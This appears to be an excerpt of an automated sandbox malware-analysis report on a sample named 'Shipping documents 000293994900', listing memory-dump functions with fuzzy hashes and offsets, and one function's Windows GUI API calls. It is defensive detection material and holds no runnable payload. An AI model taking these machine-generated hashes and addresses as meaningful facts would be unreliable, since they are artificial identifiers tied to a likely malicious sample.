Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4587e7cf0ac86e5d262aeffb1d39b217e19be5922cf07fcd6b755971433fad8f
Instruction ID: cfb7e1240c5e466a4d179bb896cb8092e5877625aa32ddcfd747490088e7794e
Opcode Fuzzy Hash: 4587e7cf0ac86e5d262aeffb1d39b217e19be5922cf07fcd6b755971433fad8f
Instruction Fuzzy Hash: 0141EA30212241CFCB09DF38ED809567F7BFB9E714384416AD215EB235DB64698BDB98

Function 00165058 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e22274043e2736d588c14d84bd4b806ed92964492af82a4d545238f91626c30
Instruction ID: 2ea3950af33337573b9286f6c553d028462cad0b736cfb9843733db59d3ba876
Opcode Fuzzy Hash: 6e22274043e2736d588c14d84bd4b806ed92964492af82a4d545238f91626c30
Instruction Fuzzy Hash: 493147306006159FDF18EB78CD506AE73B3AF89345F2005A9E806EB394DB36DD92CB94

Function 001626A8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322e91d8ca90882d5a832b0ef40cfebd53194d2d5d5189e5e84d103330af5c10
Instruction ID: f82f90ff7d1f24774de22f83a8708fb16adee6b6a0559c1c397760b91f62fab5
Opcode Fuzzy Hash: 322e91d8ca90882d5a832b0ef40cfebd53194d2d5d5189e5e84d103330af5c10
Instruction Fuzzy Hash: E441FEB0D00749DFCB14DFA9C984ADEBFB5FF48314F248429E809AB254DB75A985CB90

Function 00165068 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc5913829f62db0814267e3d73f03e4326d536e0cc8feac8fbaa172830a1e55
Instruction ID: beb9e7d8ac9e34ca6c06bd57a0993b9fcd4fc83c8d373b146b12304b74347f15
Opcode Fuzzy Hash: 6dc5913829f62db0814267e3d73f03e4326d536e0cc8feac8fbaa172830a1e55
Instruction Fuzzy Hash: 75315830A006159FCB18EB78CD106AE73B3AF89345F2004A9E806EB394DB36CC52CB91

Function 00167E71 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb685cb331ca1cb4fd8b26a9a874670a520a364035948c11ce3ad351d71cc599
Instruction ID: f52cea0cc0909a959ae13957f70b579342d25c8d370ac1a16e70a77ac6d2482a
Opcode Fuzzy Hash: bb685cb331ca1cb4fd8b26a9a874670a520a364035948c11ce3ad351d71cc599
Instruction Fuzzy Hash: A1317C347002148FDB09AB74D854A2E37ABEF88718F208469E50AD73A9CF359C87CB95

Function 388D3B98 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab972a3e189c6d0abad6ba23a21631a3f4be4b818fbc8244d85db1c0afd7708b
Instruction ID: 141de8cc93ee6d8e563fe6d31f713df1829007f55f9bf46f67283cc6b913c035
Opcode Fuzzy Hash: ab972a3e189c6d0abad6ba23a21631a3f4be4b818fbc8244d85db1c0afd7708b
Instruction Fuzzy Hash: 60218175F012059FDB10DF78C880AAEBBF6AB88710F144125E959F7390E735D906CB55

Function 388D3BA8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a84bb438671ed6b48873ce6e427657b795baecb000d4c03e83099a1c7e457a84
Instruction ID: be3ea4c2d9f6270d320ba816263d4b86d8713fbaa872c07fa32aeb78bc20950a
Opcode Fuzzy Hash: a84bb438671ed6b48873ce6e427657b795baecb000d4c03e83099a1c7e457a84
Instruction Fuzzy Hash: 8D214A75E012159FDB00CFB9C880AAEB7F6EB88710F548029EA29F7350E731D9468B95

Function 0016A000 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b380a00b249ad278a2e03a881a9bffde0560adf6a4adc0989c71c0559f277c2
Instruction ID: dc623e2ad63ba7802eea713a890a2a98ee31b76b254a3f496574786d9a5fa572
Opcode Fuzzy Hash: 2b380a00b249ad278a2e03a881a9bffde0560adf6a4adc0989c71c0559f277c2
Instruction Fuzzy Hash: E4213231E142059BDB18CFA4C85069EB7B2AF85314F61862AF815FB250DB75AC46CB52

Function 00161342 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976d1af2d2e40a0678c4c31100be7ef6ded8e2a2651e217a28024aa3328ba634
Instruction ID: cbde836800626c7fe1b4479bac3b0208e0f8efaf75f4b95cbb73b7b94ee0eaec
Opcode Fuzzy Hash: 976d1af2d2e40a0678c4c31100be7ef6ded8e2a2651e217a28024aa3328ba634
Instruction Fuzzy Hash: 95219D30A00201ABEF255B35DD9572D3A66EB53321F18086AE407DBBA1DF69CCE6C746

Function 00164F48 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ecf5f68aa0ed98949f4af2ed82c2fdfd960e2b4be7d17c572d80ad397c7ee5
Instruction ID: 755382b3470215ed8ee48f47567d031de55ba6dde02fef24a6ecc92d6c3b4fc0
Opcode Fuzzy Hash: 65ecf5f68aa0ed98949f4af2ed82c2fdfd960e2b4be7d17c572d80ad397c7ee5
Instruction Fuzzy Hash: 1D212770610205CFDB54EB78C959BAE7BF2AF88344F2044A9E406EB3A1DB35DD41CB90

Function 000AD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301015182.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882a16d00076381560995e26cbd9c5049af135524833c6673547929b698fed9f
Instruction ID: a9ce80483b613ec9dfd00db0927668982e7d4e96a20915ea43853aeb9f0ac30f
Opcode Fuzzy Hash: 882a16d00076381560995e26cbd9c5049af135524833c6673547929b698fed9f
Instruction Fuzzy Hash: E921F271604204DFCB24DFA4D980F26BBA5FB89314F24C56AD94A4B656C33AD846CA62

Function 0016A010 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbf24372cc36bc4c9d6539360c2d0a27273e3410d905287fabce1be63f22bc7b
Instruction ID: 49c27a6f1600cee9a7f6e807742ef3fe1ebe5c44b2ac7a6aa0e26e9d07f94cdc
Opcode Fuzzy Hash: dbf24372cc36bc4c9d6539360c2d0a27273e3410d905287fabce1be63f22bc7b
Instruction Fuzzy Hash: 74216231E003069BDB18CFA4C85069EB7B2BF89314F60C61AF815BB350DB71AC46CB52

Function 00161848 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f7c2685a994c7f83904d14600d12619137389fb7605ef5ad0f71ad0da970aa
Instruction ID: 30352028a93ff395a80586f9d9b98827976ea0bb8be7b4f321326930f6104b33
Opcode Fuzzy Hash: 02f7c2685a994c7f83904d14600d12619137389fb7605ef5ad0f71ad0da970aa
Instruction Fuzzy Hash: BF213A30B012059FDB18DB78CA257AE77F6AF89345F140469D106EB3A4DF368D61CB91

Function 00161670 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbad221996ffb6c718a6d566cc6402437ae81ac723dc1aeb95ef1399cb6307b
Instruction ID: c0797d0b86987d19a833b3ae85c3e0a78a114b35737bd76fe0730171b669a5e3
Opcode Fuzzy Hash: 0dbad221996ffb6c718a6d566cc6402437ae81ac723dc1aeb95ef1399cb6307b
Instruction Fuzzy Hash: 3C21C0342000006FDF20DB38EC84B693B6BEB4A724F444936D10ADB264EB78DDD6CB91

Function 00164F58 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7abd58ecd01a4dda20d43094af17829ad4ed55de0da40b0f0c37e6b470336a31
Instruction ID: 89abf39d074ed2318444c07d2cc2eff2914301e08c90a3120fe5a4adef012c15
Opcode Fuzzy Hash: 7abd58ecd01a4dda20d43094af17829ad4ed55de0da40b0f0c37e6b470336a31
Instruction Fuzzy Hash: C421E630610205CFDB14EB78C959AAE77F2AF88344F2045A9E406EB3A1DB35DD41CB90

Function 00161780 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af14532a0d248262c9c06b0a0250b768c01d35f1cd09b653a9a89c0e8c93f561
Instruction ID: 2615ce25e346658bfeaf15c50539a1c005d8d3891ce4a9e64cc36667914288d7
Opcode Fuzzy Hash: af14532a0d248262c9c06b0a0250b768c01d35f1cd09b653a9a89c0e8c93f561
Instruction Fuzzy Hash: 0F11E572B00251AFCF509B789C0465E7BE6EB4A760F144436EA09D7340EB34D85287D6

Function 388D3CB8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4384676f0790fe6549daadfedfa0419484ee971d99a339a35c3cace92e8e69
Instruction ID: 1540ca420344a54cf6f97a10b66010a6665182c60626af795b47aa144f07da1e
Opcode Fuzzy Hash: ce4384676f0790fe6549daadfedfa0419484ee971d99a339a35c3cace92e8e69
Instruction Fuzzy Hash: D211AD36B002288FEB549668D8146AE73AAEBC8650F058139D50AFB344EE25DC078B92

Function 388DEE51 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cafa5046b492b2a09f19dee7d207590914171e4421d724f037f5a0c5857b455
Instruction ID: 0e5a558499865e622b87d9ceb0439eac47b901896b1410f4a20b78b5360ebd0a
Opcode Fuzzy Hash: 5cafa5046b492b2a09f19dee7d207590914171e4421d724f037f5a0c5857b455
Instruction Fuzzy Hash: B701D4353041144FEB169B7DC455B6E77DADBCA754F10853AE50ACB381DA25DC0B4391

Function 388DEF0F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58abfcc76d69c51a5280ef00405b24238d31c5db57ebdbd73abec8c7b5b426c4
Instruction ID: fb3e369faa6da79a2410cd70416b28ca42514a7d89c8733179fc41d63bc265fd
Opcode Fuzzy Hash: 58abfcc76d69c51a5280ef00405b24238d31c5db57ebdbd73abec8c7b5b426c4
Instruction Fuzzy Hash: 9301F1257093F14FE7135A3D986568A3FA1CF82659B0545F7D0C4CB6A3C80CC90EC3A2

Function 00161448 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f01a01dec55f467533a619ad97ceddab43c5925ca917a7916ab63c86f35f137
Instruction ID: 9c96ab13fafad166d56ca473b6a382777c885f4ec32bbce51c8b2f243c5ab7e5
Opcode Fuzzy Hash: 9f01a01dec55f467533a619ad97ceddab43c5925ca917a7916ab63c86f35f137
Instruction Fuzzy Hash: 5B118231E012149FCF65EFB888511AE7BF1EF49350B2904B9E805E7242DB35C8528791

Function 388D3CA8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ac5e0cadce207a302f7e150835eb93c65166c1398687e31b3825c10ee12901
Instruction ID: b4d0832d8ca8d7ed58ea07d29877828789c37f3edad244774a831fbe59fde9a1
Opcode Fuzzy Hash: 59ac5e0cadce207a302f7e150835eb93c65166c1398687e31b3825c10ee12901
Instruction Fuzzy Hash: 6001F73AB002189BEB549668DC14AEF77EBABC5610F050235D519FB284EE25CC0B8BD3

Function 388D42F8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d267416b26d815db7ef1840a3a474719e82cc14b0a08b6ca1767e81f9f31e8a2
Instruction ID: 5460eccb8b74e59e587b49105d785cdcb86906745a2de0c1b92cacd059776ab3
Opcode Fuzzy Hash: d267416b26d815db7ef1840a3a474719e82cc14b0a08b6ca1767e81f9f31e8a2
Instruction Fuzzy Hash: 3B01F1367000115FE719CA7C9814B5EBBDADBCA314F25843EE00EC7B62D955DD0687C1

Function 00161458 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 780458dbb7796fc50ba4c237955119f70a1de8ec50851e533ac587f08b2e9487
Instruction ID: acf4108dff3021d0fc475e82e4323899d02b42f226bfaeddbf055a66c12fd928
Opcode Fuzzy Hash: 780458dbb7796fc50ba4c237955119f70a1de8ec50851e533ac587f08b2e9487
Instruction Fuzzy Hash: 2F018031E013149FCF25EFB988512AE7BF5EF48310B2904B9E805E7242EB35D8528BA1

Function 000AD02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301015182.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ad000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
Instruction ID: 32f565284dcd60c5411947837443950d1157860d12ad16c477a22463009a6f1e
Opcode Fuzzy Hash: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
Instruction Fuzzy Hash: 3511DD75504280DFCB12CF54D5C4B15FFB2FB89314F28C6AAD84A4BA56C33AD84ACB62

Function 388D3978 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e5cdc71acb309c2efad4b2e342205b0e4e5c07ab5f30e18e5d2623248126f7
Instruction ID: 333c9efbd77d829f2511d42a898df0462acaf4fefb41d3934c77e55b4614bc11
Opcode Fuzzy Hash: 84e5cdc71acb309c2efad4b2e342205b0e4e5c07ab5f30e18e5d2623248126f7
Instruction Fuzzy Hash: 9411C2B5D01259AFCB00CF9AD884ADEFBB4FB49310F10812AE918A7200D3746954CFA5

Function 388D3970 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82df664c299bd82ad7f97a52551e65e0e6435f85ad31384882bce64c4350f806
Instruction ID: 8bfc9919bad9f0b3ac8b25a4ca7372c0bc08ad211ec22293a775c2cfe040db96
Opcode Fuzzy Hash: 82df664c299bd82ad7f97a52551e65e0e6435f85ad31384882bce64c4350f806
Instruction Fuzzy Hash: 9321CFB5D01259AFCB00CF9AD984ADEFFB4FF49310F10826AE918A7200D3786954CFA5

Function 388DA3C9 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d371d95de274438c385b20d9c01a24334a4867a06f73081e4faba854473eb018
Instruction ID: 4f426b66f09283d7612ad1bfdfad14312d8c1e0009bc9c579fe4ffae63ef0c46
Opcode Fuzzy Hash: d371d95de274438c385b20d9c01a24334a4867a06f73081e4faba854473eb018
Instruction Fuzzy Hash: EC01DF357440518FE7059E3CD964BAA2BE7DBCA744F20857AE10EDB392EA15DC078781

Function 0016F200 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e4ac8ce10dfba784498da190bfb54fd5cec55514ee1a6d8e96d44fc2015536
Instruction ID: 3a70d034487bfea1350d1e97b669f7673f272e98f6769381d621c952d7ffaa1f
Opcode Fuzzy Hash: 31e4ac8ce10dfba784498da190bfb54fd5cec55514ee1a6d8e96d44fc2015536
Instruction Fuzzy Hash: 8E01FF343002555BCB265AB9A9226AA7A9BDFC2314F00467ED459CB356DB19CC0B8B91

Function 388D4308 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbabe5bcaba12f583b676e8cf82a066a6878ab5ada155b3703a6778bb9f6331b
Instruction ID: eebf03137e0d850a4b6788c411fdfbfdc7da17822deef7e4ca1647961d835202
Opcode Fuzzy Hash: fbabe5bcaba12f583b676e8cf82a066a6878ab5ada155b3703a6778bb9f6331b
Instruction Fuzzy Hash: E101A93A7000115BEB18DA6DD814B1FE2CACBC9764F20843AE10EC7B55EA65DD0643C1

Function 388DEE60 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d826dea162ba48b9d5c59cb5a9e93d7ef7d5b077b1a95387b5259b0ed3f4279
Instruction ID: 85510949a934958569446726f2e80f30c5a6c4aad0c5020527a0353c5921dd2a
Opcode Fuzzy Hash: 5d826dea162ba48b9d5c59cb5a9e93d7ef7d5b077b1a95387b5259b0ed3f4279
Instruction Fuzzy Hash: 5501AF357004108BEB159B6DD455B2F77DADBC9B65F208839E50EC7340EE25DC0B4391

Function 388DA3D8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2060928e539b480783f4d27b4f84a2a46289660cff7ce7a2188bf889be8cc26c
Instruction ID: e3dadb9ddc79801111c329d34f06ba0c81757d316cacc6c9e7da9a1272adaa24
Opcode Fuzzy Hash: 2060928e539b480783f4d27b4f84a2a46289660cff7ce7a2188bf889be8cc26c
Instruction Fuzzy Hash: 4301A9357400108FE708DA2CD459B9A73E7DBC9754F608839E10AD7391EA25EC078381

Function 0016F210 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf9f85f6843691855c1b3b5614666796293a704c6e3b64d44b89fc0931150c2
Instruction ID: 0f34654b998fc606eccecad629b30965a422969d5e0e50363be67f3fa2ce59d1
Opcode Fuzzy Hash: 5cf9f85f6843691855c1b3b5614666796293a704c6e3b64d44b89fc0931150c2
Instruction Fuzzy Hash: 0AF024343002155BCB2166BEF92266A76CEDFC2314F00493ED00ACB315DB24DC078B91

Function 388D6540 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782338e8b0fdbd43b47f8e29b745c352a9d37bfba97652f26d75b4caa5c82f74
Instruction ID: 9334155e13f7f40e6a49543164a030ab3f1c8d0e7e093b86fbf212fc930b8f7b
Opcode Fuzzy Hash: 782338e8b0fdbd43b47f8e29b745c352a9d37bfba97652f26d75b4caa5c82f74
Instruction Fuzzy Hash: EAE09270A08348EFEB01DE7889496897BB99B02244F2045A6D448DB682E637C94A8791

Function 0016E7C0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 480d756836a946f9b9d27bf4d9339a3df77aed15f7f530a37834d11f050256cd
Instruction ID: 898184b68a2e58c00509ba788e1478f926c8ff60be498253583d0ea434b270aa
Opcode Fuzzy Hash: 480d756836a946f9b9d27bf4d9339a3df77aed15f7f530a37834d11f050256cd
Instruction Fuzzy Hash: 5FD02B3120D3949FD336576C68446E57FED6B41290F08426EF446C7283DB50A811C7C1

Function 0016E7D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50122f7e6dcffc7495d5ab280f741339c72f031b7305916e5a5e49eedaac08ef
Instruction ID: 7620a52ec656e1089620a4ff2a6af79aa83ec2b0d787955317340e3a085b74ed
Opcode Fuzzy Hash: 50122f7e6dcffc7495d5ab280f741339c72f031b7305916e5a5e49eedaac08ef
Instruction Fuzzy Hash: F9D05E34205B509BD324D62CD544A52B7D9BB48714B944619F44783A40CB60BC01C7C0

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
